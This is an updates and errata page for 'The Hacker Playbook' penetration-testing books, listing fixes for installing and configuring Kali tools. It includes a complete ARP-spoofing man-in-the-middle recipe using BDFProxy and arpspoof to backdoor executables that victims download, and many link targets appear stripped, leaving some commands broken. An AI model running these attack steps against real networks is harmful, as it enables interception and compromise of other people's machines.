The Hacker Playbook 2 Updates 04/30/2017
If you trying to access the old blog hosted on, it's now moved to For example, if you are still looking for the Evade code, try: and (python source code).
Free Radius Update
- Looks like the patch is no longer available (wget
- New link:
- wget
- Also, If you get an error about: radiusd: error while loading shared libraries:
- Run: ldconfig
Kali Metasploit Logging
- In the new version of Kali 2.0, I think the msfconsole.rc was moved from /root/.msf4/msfconsole.rc to /root/.msf5/msfconsole.rc. To configure Metasploit command logging, use the command: echo "spool /root/msf_console.log" > /root/.msf5/msfconsole.rc
- Thanks Ronnie!
BackDoor Factory Proxy
- It looks like the book was missing a configuration setting for the BackDoor Factory Proxy (BDFProxy). Make sure in the configuration to modify transparentProxy = transparent. Here's what the full installing and implementation on a fresh Kali image will look like:
- apt-get update
- apt-get install bdfproxy
- apt-get install mitmproxy
- apt-get install python-openssl
- apt-get install openssl
Modify the Config:
- vi /etc/bdfproxy/bdfproxy.cfg
- Change all HOST IPs to your Kali IP
- Change transparentProxy = transparent
Start BDFProxy:
- bdfproxy
Start the Meterpreter Resource File:
- msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
Arp Stuff:
- sysctl -w net.inet.ip_forwarding=1
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- arpspoof -i eth0 -t victim-ip gateway-ip
- arpspoof -i eth0 -t gateway-ip victim-ip
And you should be all set. Give it a try by downloading and executing a 32 bit version of Winrar (example: from your victim host. Watch the shells fall from the sky!
- Thanks Joseph from Canada!
BackDoor Factory Installation
- In the tools installation page, there is a directory folder missing for The Backdoor Factory. Replace:
- cd the-backdoor-factory
- with:
- cd /opt/the-backdoor-factory
- Thanks AJ and Kevin!
Metasploit Start - The Setup Phase
- If you are using Kali 2.0, they have removed Metasploit Community/Pro from their image ( Therefore, they do not have a service called metasploit anymore.
- In the book's setup phase, there is a section about having to start and stop the metasploit service to build the db (service metasploit start). Instead of this command, just run: msfdb init. That will build the database.
- Thanks Jack!
Discover Tool - Passive Scan
- As Kali 2.0 broke some tools, I've been trying to find fixes for what I can. The Discover module had goofile broken with the update. To fix this issue in Kali 2.0, run the following commands:
- wget ""
- unzip -p goofilev1.5/ > /usr/bin/goofile && chmod +x /usr/bin/goofile
- Thanks Julien!
Also, I noticed Discover changed their installation script. In the PREGAME - THE SETUP.
- OLD:
- git clone /opt/discover
- cd /opt/discover && ./
- NEW:
- git clone /opt/discover
- cd /opt/discover && ./
- Looks like Kali 2.0 broke Recon-NG. If you get the following error "Module 'recon/domains-contacts/metacrawler' disabled. Dependency required: 'PyPDF2'" in Kali 2.0, run the following commands:
- pip install PyPDF2
- pip install olefile
- Thanks Pamela!
- Tiny change configuring GitRob. When running the command: ./gitrob --configure, they now specify the database port. For postgres use port: 5432:
- Looks like a few small changes with Kali 2 on the Setup Phase.
- Create Account (instead of openvas-adduser):
- openvasmd --user=admin --new-password=admin
Login (instead of gsd):
- Go to the browser to:
- Looks like DSHashes might have been removed from svn.
- Download the old archive from and move to /opt/NTDSXtract/
All Updates From The Hacker Playbook 1
- 08/19/2015
- Updates from The Hacker Playbook 1: Page 12 for Installing Social Engineering Toolkit
- Looks like there was a change to SET on page 12
- Here is the updated GIT Command:
- git clone set/
Saving Custom Password Lists (Page 10) - 2nd UPDATE
- Looks like the old link is now dead:
Try these other links:
Start Metasploit on Page 7 The line: "service Metasploit start" should be:
- service metasploit start
- (Thanks John)
Changes have been made to PeepingTom and I've had problems with the new version. I have included the old version here: On your Kali Linux Box, run the following commands from a terminal:
- cd /opt/
- wget
- unzip
- cd peepingtom
- chmod +x *
Huge List of Optional Tools: On your Kali Linux Box, run the following commands from a terminal:
- mkdir /opt/gitlist/
- cd /opt/gitlist
- git clone
- cd gitlist
- chmod +x
- ./
Install bypassuac Update The book points to:
- wget
- to download the bypassuac files, but the updated link should be:
- Thanks Patrick!
Nishang has moved: Page 16 Nishang has moved over to github. Instead of:
SMBExec Update - Page 8 SMBExec updated and has a new Git Repo. So instead of:
- git clone
- Try:
- git clone
PowerShell Invoke-Shellcode - Meterpreter If you've been hard coding your Invoke-Shellcode.ps1 files to download and execute from github (Originally found here:, make sure you grab the newest one as the original is not working (on purpose). As stated by mattifestation, you shouldn't blindly run a remote powershell script from github. If you need to, fork it!
Obscure System's Post Exploitation Link Fixed On Page 121 Obscure System's Post Exploitation:
- Thanks Joe
Index to Hacker Playbook Thanks to Joe, he put together an index for The Hacker Playbook!!!
Free Radius Update - Page 205 Looks like free radius changed their website. Change:
- wget tar.bz2
- To:
- wget
- Thanks Jason!
Mimikatz Binary Update:
Get In Touch
- If you would like to get in touch with the author or have general inquiries about the book
- [email protected]